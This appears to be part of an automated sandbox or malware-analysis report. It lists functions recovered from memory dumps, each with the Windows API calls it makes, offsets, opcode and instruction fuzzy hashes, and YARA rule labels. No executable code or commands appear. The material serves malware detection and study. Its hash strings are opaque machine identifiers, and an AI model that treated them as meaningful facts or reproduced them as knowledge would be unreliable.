              Uniqueness Score: -1.00%

              Function 0121B71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
              Download Yara Rule
              APIs
              • CreateIconFromResourceEx.USER32 ref: 0121B78A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: fdac6c8bc1290e0df5d718b18556775f19aeeddc54e5dc51d9287818c2f98245
              • Instruction ID: c95547f0969583bb0c6fe717dec528f31d4c6d69f1cda50cf9e6c25eed3a1d6a
              • Opcode Fuzzy Hash: fdac6c8bc1290e0df5d718b18556775f19aeeddc54e5dc51d9287818c2f98245
              • Instruction Fuzzy Hash: AE1190324083809FDB22CF55DC84A52FFF4EF09310F08849EED858B522C375A418CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0121BF0C
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 89f1c5f16020963ca6b07b009e7fd15c98044ed7e087fea686942b4b8019f6bb
              • Instruction ID: 12625f6b706eead940e8c0c22abae62ed1a71ec25f19cef5c96c44603a819c7e
              • Opcode Fuzzy Hash: 89f1c5f16020963ca6b07b009e7fd15c98044ed7e087fea686942b4b8019f6bb
              • Instruction Fuzzy Hash: 18118F715053819FD711CF2ADC84B56BFF8EF06220F0884AAED85CF656D274E848CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A75B, Relevance: 1.6, APIs: 1, Instructions: 52comCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 5e163fb7655078fa0475b0188a2e0a1d43ed27fbdaa35235afa9b7b9d495853a
              • Instruction ID: e30de9516c6715dc5ef7ccc2aac7de54852f3097f53b59090969e543fe6ee034
              • Opcode Fuzzy Hash: 5e163fb7655078fa0475b0188a2e0a1d43ed27fbdaa35235afa9b7b9d495853a
              • Instruction Fuzzy Hash: A4119A714493849FD712CF25DC84B52BFB4EF02220F0984EBED898F253D279A848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A8CC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0121A926
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 59775c431f62b5700e253f575371c97ab60c9e172efb05743d521443cdaaf585
              • Instruction ID: 514d6abaeeda0c9509ad53607ca36e17c858a98a04a19ab2b16f84b6c919aa4d
              • Opcode Fuzzy Hash: 59775c431f62b5700e253f575371c97ab60c9e172efb05743d521443cdaaf585
              • Instruction Fuzzy Hash: 92119A354097849FC722CF15DC85A52FFF4EF16220F09C49AEE858B262C275A848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0121BF0C
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 8f8832b508b0527f69bcad512db2610fab1357df2a1b4d0884cba3b9d5282e88
              • Instruction ID: 5018d2550b90ed125681c48aa5578b178cc74a5cce76dcf1293e09b44983e1cd
              • Opcode Fuzzy Hash: 8f8832b508b0527f69bcad512db2610fab1357df2a1b4d0884cba3b9d5282e88
              • Instruction Fuzzy Hash: 200152716103419FDB60CF2AD885766FBE4EF14220F08C4AAED49CB64AD675D404CE62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121A58A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 7545a928382544bc1d8189356696fe14641b1e0dd27b23d80a4d9bcdf46bb4c1
              • Instruction ID: dddb59d3324b3d8b3417bcc19077306827c452d27dc40cc00434148c1a34f389
              • Opcode Fuzzy Hash: 7545a928382544bc1d8189356696fe14641b1e0dd27b23d80a4d9bcdf46bb4c1
              • Instruction Fuzzy Hash: 56013C71915740AFDB21CF55D844B56FFE4EF18320F08C4AADE494BA16D375A414CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121B746, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
              Download Yara Rule
              APIs
              • CreateIconFromResourceEx.USER32 ref: 0121B78A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: a3675eb428cfba76649a2109f1b7855801f81aa975b4a6988d6674cfaec5dd82
              • Instruction ID: 4069aa1bf2fa9a1c04a3e123037d11fba2beebeeabb438af442e1b03d16490f5
              • Opcode Fuzzy Hash: a3675eb428cfba76649a2109f1b7855801f81aa975b4a6988d6674cfaec5dd82
              • Instruction Fuzzy Hash: 9A015E324107409FDB21CF55D844B56FBF0EF18320F08C4AEDE454AA16D375E415DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0121AFEA
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: ConsoleCtrlHandler
              • String ID:
              • API String ID: 1513847179-0
              • Opcode ID: 90c2e31316479ebec68909eb1f7c92e459e86df0e2792e125bcdb4a8119a03a8
              • Instruction ID: 07ed6b34132149b68c0c2d6bf3dde51cb73351ffb8ff236c45eef8d705b8c0aa
              • Opcode Fuzzy Hash: 90c2e31316479ebec68909eb1f7c92e459e86df0e2792e125bcdb4a8119a03a8
              • Instruction Fuzzy Hash: 9701A271500600ABD214DF1ADC82B26FBA8FB89B20F14815AED084B741E271F516CBE6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121BBB9
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: a4bcde9ecaac018339514cc753c6128ac44659204d66184a5b00f2f5a8eb1fc1
              • Instruction ID: 3c58bea4c1ce191a63d937cb5d018daf6bf09346f75fc4a7b491d68d5bb15f99
              • Opcode Fuzzy Hash: a4bcde9ecaac018339514cc753c6128ac44659204d66184a5b00f2f5a8eb1fc1
              • Instruction Fuzzy Hash: 84019E355103408FDB21CF1AD885B65FBF0EF14320F08C09ADD454BA6AE275E518CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A78A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: ec23aadb7f0873ad1e262e2e629245af68bede15b417e23a65a1b5a7d213a381
              • Instruction ID: 9df1fc8af5b0b7850d5bb359b479c3d00c65b3b5a32bfc779b693521e8d3fdf9
              • Opcode Fuzzy Hash: ec23aadb7f0873ad1e262e2e629245af68bede15b417e23a65a1b5a7d213a381
              • Instruction Fuzzy Hash: 6201A2745113808FDB20CF1AD885765FBE4EF14320F08C4ABDD498F64AD279A504CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121B806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121B841
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: b95bdcc5b69c7f3a531a0c6661215d974fde0fb893e81a25b4e80b84f1e5da21
              • Instruction ID: eb1eb14db4152bab91ac35dfc78f7de9111e3d97237fc9bfd481ac00ad7266c0
              • Opcode Fuzzy Hash: b95bdcc5b69c7f3a531a0c6661215d974fde0fb893e81a25b4e80b84f1e5da21
              • Instruction Fuzzy Hash: 56017C315103409FDB21CF56D885B65FBF0EF18720F08C49ADE494B626D275A458CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A8EE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0121A926
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: d88d329197f986ab8d3d0e3c23d08bb85ef2f7bd2cbc536bd199f660e06e4e6b
              • Instruction ID: 4601da6912478d8045dc6850657f210ad2ace5b4c97c04f0710b95cdc378db7f
              • Opcode Fuzzy Hash: d88d329197f986ab8d3d0e3c23d08bb85ef2f7bd2cbc536bd199f660e06e4e6b
              • Instruction Fuzzy Hash: 0001A2355117408FDB20CF16D885751FFE0EF14320F08C49ADE450B656D3B5A448CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
              Download Yara Rule
              APIs
              • DispatchMessageW.USER32(?), ref: 0121BE70
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: e3675272fcac5302d12d9d74613f04ce12b8f145b396b69b9bf363ecd956f3fd
              • Instruction ID: 8dd3eda8ae81324966c9a07746c0ea0f8775efa800dc1fc6dec5918f3bbc263b
              • Opcode Fuzzy Hash: e3675272fcac5302d12d9d74613f04ce12b8f145b396b69b9bf363ecd956f3fd
              • Instruction Fuzzy Hash: 2EF0A4359143408FDB20CF1AD885761FFF0DF14320F48C49ADE494B65AD3B9A408CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D1458, Relevance: .1, Instructions: 128COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 35911234a837d3e87011c551ce664ae47df6ec04ecbd98b47b6ab5ea68c82af3
              • Instruction ID: 6ac8a357b12b1191f877d1a9fe83688718120ed2f0d9ec8f844af5a15a79d889
              • Opcode Fuzzy Hash: 35911234a837d3e87011c551ce664ae47df6ec04ecbd98b47b6ab5ea68c82af3
              • Instruction Fuzzy Hash: 1A51F234A00219CFDB14DF64E894BADBBB2BF48340F1141E9D50AAB369CB359D85CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D0006, Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 51b76de62b00cf509b19b1070e67a2e119da423171cafa0a59746032666ef7c8
              • Instruction ID: 1288a2fc600a74b01a37d83b842fd1b9200abc1c51378a1840233a77e1dc4ce9
              • Opcode Fuzzy Hash: 51b76de62b00cf509b19b1070e67a2e119da423171cafa0a59746032666ef7c8
              • Instruction Fuzzy Hash: DA319231519386EFC716EB74E86826D3FF1AB52200F05459BD485CB15AEA388845CB53
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D2C58, Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c85b26d4479648ee40bb59d7f9379af08a31a0e77d2bc0482756280abe2d7f80
              • Instruction ID: fc4897c1c1afaaa143839c5092cc40da5d43024973b8d9bb8613f41580e448c8
              • Opcode Fuzzy Hash: c85b26d4479648ee40bb59d7f9379af08a31a0e77d2bc0482756280abe2d7f80
              • Instruction Fuzzy Hash: DB21043860835BDFC725CB28F48897DFBE6BF46214B1552A7E45ACB261C7619C40C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D1218, Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a825db4850d2fc86d63e30abafb50ceee7db61e1d52f60f5480e8ca36da9006
              • Instruction ID: 1048988649432f23423e320f02e9b8bc6c17fb06d525dd4104256eeb070b744a
              • Opcode Fuzzy Hash: 9a825db4850d2fc86d63e30abafb50ceee7db61e1d52f60f5480e8ca36da9006
              • Instruction Fuzzy Hash: 73013130314214CBC714EB28E05897DB7EBBFD5610B2541AAE506CB7B9CF769C09C796
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D0908, Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 576e1cf3a45b296dd5aac746e5076c33f70c98f42a79d7022e0d5f94b59cfbec
              • Instruction ID: 13484d4ca4add501e98e832912d5abae8eab168d982a729360516c13dd221bc9
              • Opcode Fuzzy Hash: 576e1cf3a45b296dd5aac746e5076c33f70c98f42a79d7022e0d5f94b59cfbec
              • Instruction Fuzzy Hash: 8BF0E930519358DFD350DBB8942C55FFBFA9F46310F124467D94A97201FA789C1287A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D0918, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16deb057c85b6e06e83494618bfc0e7900672e266705dd7bcba8a861c115c34f
              • Instruction ID: 3f473352c6e431b019b18318089a6cea21c2760aeb7ba55789f74c36458c9dd7
              • Opcode Fuzzy Hash: 16deb057c85b6e06e83494618bfc0e7900672e266705dd7bcba8a861c115c34f
              • Instruction Fuzzy Hash: 77E0E532B1A318DADB2099F9B8281AFFBAA9785260F014527D90F93204F974880242F2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D2D20, Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8537295b61bd2a952313335baba4c5a3aff2799358a6d02c387a2ad7c3c03731
              • Instruction ID: c9df3205385f5fd483dd5e949c84e844269b4663d67c3372202937f9bdf75a27
              • Opcode Fuzzy Hash: 8537295b61bd2a952313335baba4c5a3aff2799358a6d02c387a2ad7c3c03731
              • Instruction Fuzzy Hash: 21D05E3808CBA7EFD35296B478167ACBFA59B0B715F0909E2D1868D0A6D1661843CB73
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050D064F, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22869ae0f2366fdc92304c2767fbc2766389395cf15a343b8c5dd1aee49a2784
              • Instruction ID: d9a9065f9c165ad56e9cc9564884568b95665f303b523f8f31261f127d7d95e8
              • Opcode Fuzzy Hash: 22869ae0f2366fdc92304c2767fbc2766389395cf15a343b8c5dd1aee49a2784
              • Instruction Fuzzy Hash: D5D0977244D3849FC3214AB1283E0ECBB25CFA3209B1048FAD4008D921F1373A839BA2
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions